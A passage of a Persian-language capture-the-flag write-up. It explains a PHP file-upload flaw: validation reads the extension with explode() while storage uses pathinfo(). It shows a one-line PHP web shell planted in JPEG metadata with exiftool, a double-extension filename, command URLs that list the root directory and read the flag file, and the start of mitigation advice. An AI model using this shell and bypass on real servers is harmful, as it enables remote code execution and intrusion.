.php را آپلود میکند. این تلاش نیز با شکست مواجه میشود، که نشان میدهد سرور به شدت تطابق بین محتوای فایل و پسوند آن را کنترل میکند.این خطاها اطلاعات ارزشمندی به مهاجم میدهند: هم محتوای فایل باید شبیه یک تصویر مجاز باشد و هم پسوند آن باید در لیست سفید (Whitelist) باشد.
۲. کشف آسیبپذیری کلیدی در منطق PHP
تحلیل مجدد کد
index.php ضعف اصلی را آشکار میکند: عدم سازگاری بین منطق اعتبارسنجی و منطق ذخیرهسازی فایل.* منطق اعتبارسنجی (معیوب):
explode(".", $_FILES["fileToUpload"]["name"])[1]این کد نام فایل را بر اساس کاراکتر
. تقسیم (explode) کرده و عنصر دوم (اندیس 1) آرایه را به عنوان پسوند در نظر میگیرد. برای فایلی با نام shell.jpeg.php ، نتیجه این کد jpeg خواهد بود که در لیست پسوندهای مجاز قرار دارد و اعتبارسنجی با موفقیت انجام میشود. این روش برای استخراج پسوند بسیار ناامن و اشتباه است.* منطق ذخیرهسازی (امن):
pathinfo($_FILES["fileToUpload"]["name"], PATHINFO_EXTENSION)
در مقابل، برای تعیین پسوند نهایی جهت ذخیرهسازی، کد از تابع امن و استاندارد
pathinfo() استفاده میکند. این تابع برای نام فایل shell.jpeg.php به درستی پسوند نهایی یعنی php را برمیگرداند.این تضاد در منطق، یک حفره امنیتی کلاسیک ایجاد میکند. اعتبارسنجی روی یک بخش از نام فایل (jpeg) انجام میشود، اما فایل با بخش دیگری از نام آن (php) ذخیره میشود.
۳. ساخت پیلود نهایی و دستیابی به RCE
برای موفقیت در آپلود، مهاجم باید هر دو شرط را برآورده کند:
1. دور زدن بررسی محتوا: یک فایل JPEG معتبر ایجاد میکند. سپس با استفاده از ابزاری مانند
exiftool ، کد شل PHP (<?php system($_GET['cmd']); ?>) را در بخش متادیتا (Metadata)**، مثلاً در قسمت کامنتها، تزریق میکند. این کار باعث میشود فایل همچنان یک تصویر معتبر باقی بماند و از بررسی Magic Number عبور کند، اما حاوی کد مخرب باشد.2. **دور زدن بررسی پسوند: نام فایل را به
shell.jpeg.php تغییر میدهد.با آپلود این فایل دستکاریشده، تمام لایههای امنیتی دور زده میشوند. فایل به عنوان یک تصویر معتبر با پسوند
jpeg شناسایی شده، اما در نهایت با پسوند .php روی سرور ذخیره میشود.۴. اجرای دستور و خواندن پرچم
اکنون مهاجم میتواند از طریق مرورگر به شل آپلود شده دسترسی پیدا کرده و با استفاده از پارامتر
cmd در URL، دستورات دلخواه را بر روی سرور اجرا کند.http://anonupload.cyberquest/uploads/2a9526f0dd3382db.php?cmd=ls -la /http://anonupload.cyberquest/uploads/2a9526f0dd3382db.php?cmd=cat /fl444g_11d854d6a9c9341e8af155128bf74362.txtبا اجرای دستور
cat بر روی فایل پرچم، چالش با موفقیت به پایان میرسد.### نتیجه:
این چالش به زیبایی نشان میدهد که چگونه ترکیبی از آسیبپذیریهای به ظاهر جداگانه میتواند منجر به نفوذ کامل شود. راهکارهای مقابله باید به صورت لایهای و جامع پیادهسازی شوند:
1. مقابله با XXE:
* پردازندههای XML باید به گونهای پیکربندی شوند که پردازش External Entities و DTDs به طور کامل غیرفعال باشد. در PHP (با استفاده از کتابخانه libxml)، این کار با دستور زیر قبل از بارگذاری XML انجام میشود:
libxml_disable_entity_loader(true);